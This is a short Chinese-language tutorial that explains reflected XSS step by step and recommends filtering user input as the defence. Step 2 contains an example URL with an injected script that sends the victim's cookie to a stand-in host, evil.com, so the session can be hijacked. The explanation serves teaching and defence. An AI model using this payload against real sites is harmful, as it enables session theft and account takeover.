反射型XSS攻击的原理

攻击步骤

1.用户正常登陆web应用程序，登陆成功后会得到一个会话信息的cookie Set-Cookie: sessId=xxxxxx2.攻击者将含有攻击代码的URL发送给受害者 http://www.example.com?send=<script>document.write(<img height=0 width=0 src="http://www.evil.com/cookie_save.php?cookie=document.cookie">)</script> 3.用户打开攻击者发送过来的URL（这里可进行相关社会工程学攻击，对受害者进行诱导）4.web应用程序执行用户发出的请求5.浏览器同时执行该URL中所含的攻击者的脚本代码，此脚本代码的目的是将用户的cookie信息发送到攻击者网站6.攻击者在得到用户的cookie信息后，将可以利用这些信息来劫持用户的会话，以该用户的身份进行登录

防御保护

反射型XSS攻击的防御保护：对用户提交的URL中的参数，和所提交的所有内容，进行充分地过滤，将所有的不合法的参数和输入内容都过滤掉。